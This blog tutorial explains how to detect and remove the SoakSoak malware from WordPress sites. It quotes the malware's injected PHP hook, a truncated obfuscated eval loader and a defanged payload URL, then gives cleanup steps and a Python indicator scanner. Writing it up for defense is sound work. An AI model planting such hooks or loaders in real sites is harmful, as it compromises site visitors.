
How to disinfect website infected from SoakSoak malware

   

Recently, over 100,000 WordPress websites were infected by the SoakSoak malware. A report by industry-leading security expert Sucuri ascertained that Google has now blacklisted more than 11,000 domains because of the malware campaign from SoakSoak.ru. The reasons for sites being vulnerable have not yet been clarified, but all of the websites on the Inspire2rise network were safe. This is mainly because of adequate security measures and the DNS-level filtering that has been put into place. So what can you do if you are already infected with this malware? Recently a friend, Harshmeet Singh from RootMyAndroid.org, told us about his website being infected, and through his experiences we have found quite a few working methods to remove the SoakSoak malware from websites using the WordPress platform. Read on to know more about how to disinfect a website infected with the SoakSoak malware.


How to disinfect website infected from SoakSoak malware : Identification.

First, you need to identify whether you have actually been infected by the SoakSoak.ru malware. You can do two things here. The first is to look for suspicious-looking files being served from your website.

The malware modifies wp-includes/template-loader.php so that it includes the following code:

<?php
function FuncQueueObject()
{
 wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

This causes another file, wp-includes/js/swobject.js, to be loaded on every page viewed on the site. That file contains the following malware:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

The malware is JavaScript malware from SoakSoak.ru, and references this file in particular – hxxp://soaksoak.ru/xteas/code

The second thing you can do, if you find this code in your pages or are unsure whether your site is safe, is to use the Free Site Security scanner provided by Sucuri.


How to disinfect website infected from SoakSoak malware : The steps.

To disinfect your website from this malware, perform the following steps in this exact order:

  1. Download the official WordPress zip from WordPress.org.
  2. Extract this zip somewhere on your desktop and copy the wp-includes folder.
  3. Log in to your hosting account or cPanel, open the file manager, and go to the directory where your site is hosted. Delete the wp-includes folder there and replace it with the wp-includes folder from the fresh zip that you downloaded.
  4. Clear all existing caches from caching plugins as well as from your CDN (if you use a CDN solution like MaxCDN, Cloudflare, Google PageSpeed etc.).
  5. Check your site again in a browser with cleared caches, or in an incognito window, to see whether the malware still exists.
  6. Once you are done removing the malware, it's time to strengthen your site. Install the iThemes Security plugin for WordPress and configure it using the guide written by us – How to secure WordPress.
  7. DNS-level filtering through services like Cloudflare, or a compatible firewall, could save you from many future attacks, so keep that in mind as well.
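
The check below is an added example, not code from the original article or from Sucuri. It looks for the two indicators quoted in the identification section and compares the site's wp-includes against the clean copy extracted in steps 1 and 2, so it can be run before step 3 and again after step 5. It assumes the clean zip is the same WordPress version as the site; the function names and the sample directory trees are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

# Indicator strings quoted on this page (substring matches, not a full signature set).
INDICATORS = {
    "wp-includes/template-loader.php": b"FuncQueueObject",
    "wp-includes/js/swobject.js": b"eval(decodeURIComponent",
}

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def scan(site_root, clean_root):
    """Report indicator hits plus wp-includes files that differ from the clean copy."""
    site = Path(site_root) / "wp-includes"
    clean = Path(clean_root) / "wp-includes"  # assumption: same WordPress version
    findings = {"indicator": [], "modified": [], "extra": []}
    for rel, needle in INDICATORS.items():
        target = Path(site_root) / rel
        if target.is_file() and needle in target.read_bytes():
            findings["indicator"].append(rel)
    for f in sorted(p for p in site.rglob("*") if p.is_file()):
        rel = f.relative_to(site).as_posix()
        ref = clean / rel
        if not ref.is_file():
            findings["extra"].append(rel)      # not shipped in the clean copy
        elif sha256(f) != sha256(ref):
            findings["modified"].append(rel)   # content differs from clean copy
    return findings

def build_demo(root):
    """Constructed sample trees (not real WordPress files) so the check runs offline."""
    clean, site = Path(root) / "clean", Path(root) / "site"
    for base in (clean, site):
        (base / "wp-includes/js").mkdir(parents=True)
        (base / "wp-includes/template-loader.php").write_text("<?php // loader\n")
        (base / "wp-includes/version.php").write_text("<?php // version\n")
    with (site / "wp-includes/template-loader.php").open("a") as fh:
        fh.write('function FuncQueueObject()\n{\n wp_enqueue_script("swfobject");\n}\n')
    (site / "wp-includes/js/swobject.js").write_text('eval(decodeURIComponent \n("%28.."));')
    return site, clean

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        site, clean = build_demo(tmp)
        return scan(site, clean), scan(clean, clean)

if __name__ == "__main__":
    print(demo()[0])
```

Against a real site, call `scan()` with the site directory and the folder the official zip was extracted to; an empty result after step 5 means wp-includes matches the clean copy and neither indicator is present.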

Now that you know how to secure your website from the SoakSoak malware, don't forget to share this article with your friends or with people you know who might be suffering due to this malware attack. If you have any doubts or questions, or want to add another working method for disinfecting a website infected with the SoakSoak malware, feel free to comment below!


Written by Aditya Nath Jha

Aditya Nath Jha is an Engineer from New Delhi, India. His areas of interest include Gadgets, WordPress, speed optimization & latest technology.
When he is not busy blogging he loves to write poetry, compose his own songs and has a taste for music!
